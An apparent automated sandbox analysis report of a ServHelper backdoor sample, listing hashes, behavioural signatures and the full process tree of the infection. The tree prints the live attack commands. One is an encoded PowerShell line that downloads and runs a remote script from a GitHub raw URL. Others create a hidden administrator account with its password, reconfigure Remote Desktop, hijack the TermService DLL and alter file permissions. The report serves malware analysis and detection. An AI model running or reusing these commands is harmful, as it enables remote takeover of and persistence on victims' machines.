Overview
overview
10Static
static
100f56c5738a...f08901
linux_amd64
0f56c5738a...f08901
linux_mipsel
0f56c5738a...f08901
linux_mips
219156c025...f0.exe
windows7_x64
10219156c025...f0.exe
windows10_x64
102a0f53dd66...03.exe
windows7_x64
102a0f53dd66...03.exe
windows10_x64
1036ef5e0db1...a0.exe
windows7_x64
1036ef5e0db1...a0.exe
windows10_x64
104072fc745a...65.exe
windows7_x64
104072fc745a...65.exe
windows10_x64
1042c8ded976...95.exe
windows7_x64
1042c8ded976...95.exe
windows10_x64
1052969fae09...5d.rtf
windows7_x64
1052969fae09...5d.rtf
windows10_x64
10571de4698e...31.exe
windows7_x64
10571de4698e...31.exe
windows10_x64
1057bb59a2c4...52.rtf
windows7_x64
1057bb59a2c4...52.rtf
windows10_x64
10662fbe23c8...0a.exe
windows7_x64
10662fbe23c8...0a.exe
windows10_x64
1070d5a71e82...91.dll
windows7_x64
170d5a71e82...91.dll
windows10_x64
171d384c258...86.exe
windows7_x64
1071d384c258...86.exe
windows10_x64
1079745c2263...9d.exe
windows7_x64
1079745c2263...9d.exe
windows10_x64
1083c46c1972...c3.exe
windows7_x64
1083c46c1972...c3.exe
windows10_x64
108cecb6b01a...d0.exe
windows7_x64
108cecb6b01a...d0.exe
windows10_x64
10a3feb5265e...66.exe
windows7_x64
10Analysis
-
max time kernel
137s -
max time network
82s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
30-07-2021 15:26
Behavioral task
behavioral1
Sample
0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
Resource
ubuntu-amd64
Behavioral task
behavioral2
Sample
0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
Resource
debian9-mipsel
Behavioral task
behavioral3
Sample
0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
Resource
debian9-mipsbe
Behavioral task
behavioral4
Sample
219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe
Resource
win7v20210408
Behavioral task
behavioral5
Sample
219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
Resource
win7v20210410
Behavioral task
behavioral7
Sample
2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
Resource
win7v20210408
Behavioral task
behavioral9
Sample
36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
Resource
win7v20210408
Behavioral task
behavioral11
Sample
4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
Resource
win10v20210410
Behavioral task
behavioral12
Sample
42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe
Resource
win7v20210408
Behavioral task
behavioral13
Sample
42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe
Resource
win10v20210410
Behavioral task
behavioral14
Sample
52969fae09c2428c701a8b51a20c1eb07bab1bca79acb21eaa910d764533155d.rtf
Resource
win7v20210408
Behavioral task
behavioral15
Sample
52969fae09c2428c701a8b51a20c1eb07bab1bca79acb21eaa910d764533155d.rtf
Resource
win10v20210410
Behavioral task
behavioral16
Sample
571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe
Resource
win7v20210410
Behavioral task
behavioral17
Sample
571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe
Resource
win10v20210408
Behavioral task
behavioral18
Sample
57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf
Resource
win7v20210410
Behavioral task
behavioral19
Sample
57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf
Resource
win10v20210408
Behavioral task
behavioral20
Sample
662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
Resource
win7v20210410
Behavioral task
behavioral21
Sample
662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
70d5a71e821c8024fa2d5fb8a389390acc1289b88745fad61b6536cab0bd5191.dll
Resource
win7v20210410
Behavioral task
behavioral23
Sample
70d5a71e821c8024fa2d5fb8a389390acc1289b88745fad61b6536cab0bd5191.dll
Resource
win10v20210408
Behavioral task
behavioral24
Sample
71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
Resource
win7v20210408
Behavioral task
behavioral25
Sample
71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
Resource
win10v20210410
Behavioral task
behavioral26
Sample
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
Resource
win7v20210410
Behavioral task
behavioral27
Sample
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
Resource
win10v20210410
Behavioral task
behavioral28
Sample
83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
Resource
win7v20210408
Behavioral task
behavioral29
Sample
83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
Resource
win10v20210410
Behavioral task
behavioral30
Sample
8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
Resource
win7v20210410
Behavioral task
behavioral31
Sample
8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
Resource
win10v20210408
Behavioral task
behavioral32
Sample
a3feb5265e6d02710f04ff618e966e9da9ba8fc8dc5692d6f7633fe0a3037b66.exe
Resource
win7v20210410
General
-
Target
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
-
Size
9.2MB
-
MD5
5e12e56a643c71b913ea60f48f28726d
-
SHA1
8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
-
SHA256
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
-
SHA512
807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 12 2564 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
ViJoy.exeexe2.exeexe1.exeNFWCHK.exepid process 852 ViJoy.exe 848 exe2.exe 1384 exe1.exe 992 NFWCHK.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exepid process 280 icacls.exe 1852 icacls.exe 2000 icacls.exe 1528 icacls.exe 1468 takeown.exe 1912 icacls.exe 1592 icacls.exe 1652 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1720 powershell.exe -
Loads dropped DLL 7 IoCs
Processes:
ViJoy.exeexe2.exepid process 852 ViJoy.exe 852 ViJoy.exe 852 ViJoy.exe 848 exe2.exe 1916 1916 1264 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exepid process 1592 icacls.exe 1652 icacls.exe 280 icacls.exe 1852 icacls.exe 2000 icacls.exe 1528 icacls.exe 1468 takeown.exe 1912 icacls.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
exe2.exedescription ioc process File opened for modification \??\PhysicalDrive0 exe2.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a74ffc7-9cca-4845-bd46-8ff96c4ac43f powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c0b142a5-2b59-45fd-a99b-ce1f142c850f powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_55dbdebd-e428-42e4-82e2-2ef0cdfc7458 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dcd10f91-0b5f-40f7-b451-e272660bae5d powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ac761484-0ecd-4b05-83ec-285cc54d0e96 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_90ab2bf7-a5b2-485f-bbb1-f5e3aeea5b24 powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_578ff6f3-25c8-4688-81c3-ff3e7179e5c3 powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z2QY7QFOTGMKT0BUNU70.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e0bb34e5-3a6d-4514-8e04-07c75cc5c314 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_abd106a9-f5f6-41e9-b78b-a62c298b662f powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c4a40091-f455-420c-bbdd-90c865751b3b powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c695c2dd-95c9-457e-b147-d950bcde996e powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
exe2.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main exe2.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80bafa925785d701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1720 powershell.exe 1720 powershell.exe 2032 powershell.exe 2032 powershell.exe 432 powershell.exe 432 powershell.exe 1528 powershell.exe 1528 powershell.exe 1720 powershell.exe 1720 powershell.exe 1720 powershell.exe 2564 powershell.exe 2564 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 464 1916 1916 1916 1916 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1720 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeDebugPrivilege 432 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeRestorePrivilege 1592 icacls.exe Token: SeAssignPrimaryTokenPrivilege 2428 WMIC.exe Token: SeIncreaseQuotaPrivilege 2428 WMIC.exe Token: SeAuditPrivilege 2428 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2428 WMIC.exe Token: SeIncreaseQuotaPrivilege 2428 WMIC.exe Token: SeAuditPrivilege 2428 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2488 WMIC.exe Token: SeIncreaseQuotaPrivilege 2488 WMIC.exe Token: SeAuditPrivilege 2488 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2488 WMIC.exe Token: SeIncreaseQuotaPrivilege 2488 WMIC.exe Token: SeAuditPrivilege 2488 WMIC.exe Token: SeDebugPrivilege 2564 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
exe2.exepid process 848 exe2.exe 848 exe2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exeViJoy.exeexe2.exeexe1.exepowershell.execsc.exedescription pid process target process PID 308 wrote to memory of 852 308 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe ViJoy.exe PID 308 wrote to memory of 852 308 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe ViJoy.exe PID 308 wrote to memory of 852 308 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe ViJoy.exe PID 308 wrote to memory of 852 308 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe ViJoy.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 1384 852 ViJoy.exe exe1.exe PID 852 wrote to memory of 1384 852 ViJoy.exe exe1.exe PID 852 wrote to memory of 1384 852 ViJoy.exe exe1.exe PID 852 wrote to memory of 1384 852 ViJoy.exe exe1.exe PID 848 wrote to memory of 992 848 exe2.exe NFWCHK.exe PID 848 wrote to memory of 992 848 exe2.exe NFWCHK.exe PID 848 wrote to memory of 992 848 exe2.exe NFWCHK.exe PID 848 wrote to memory of 992 848 exe2.exe NFWCHK.exe PID 1384 wrote to memory of 1720 1384 exe1.exe powershell.exe PID 1384 wrote to memory of 1720 1384 exe1.exe powershell.exe PID 1384 wrote to memory of 1720 1384 exe1.exe powershell.exe PID 1720 wrote to memory of 432 1720 powershell.exe csc.exe PID 1720 wrote to memory of 432 1720 powershell.exe csc.exe PID 1720 wrote to memory of 432 1720 powershell.exe csc.exe PID 432 wrote to memory of 1500 432 csc.exe cvtres.exe PID 432 wrote to memory of 1500 432 csc.exe cvtres.exe PID 432 wrote to memory of 1500 432 csc.exe cvtres.exe PID 1720 wrote to memory of 2032 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 2032 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 2032 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 432 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 432 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 432 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 1528 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 1528 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 1528 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 1468 1720 powershell.exe takeown.exe PID 1720 wrote to memory of 1468 1720 powershell.exe takeown.exe PID 1720 wrote to memory of 1468 1720 powershell.exe takeown.exe PID 1720 wrote to memory of 1912 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1912 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1912 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1592 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1592 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1592 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1652 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1652 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1652 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 280 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 280 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 280 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1852 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1852 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1852 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 2000 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 2000 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 2000 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1528 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1528 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1528 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 964 1720 powershell.exe reg.exe PID 1720 wrote to memory of 964 1720 powershell.exe reg.exe PID 1720 wrote to memory of 964 1720 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe"C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeC:\Users\Public\Documents\Wondershare\NFWCHK.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'4⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5sxesnat\5sxesnat.cmdline"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A21.tmp" "c:\Users\Admin\AppData\Local\Temp\5sxesnat\CSCC91B983069BF4F51BD1C6A36E5BB7AD.TMP"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f5⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr5⤵
-
C:\Windows\system32\cmd.execmd /c net start rdpdr6⤵
-
C:\Windows\system32\net.exenet start rdpdr7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService5⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService6⤵
-
C:\Windows\system32\net.exenet start TermService7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc bu4XEaZT /add1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc bu4XEaZT /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc bu4XEaZT /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc bu4XEaZT1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc bu4XEaZT2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc bu4XEaZT3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
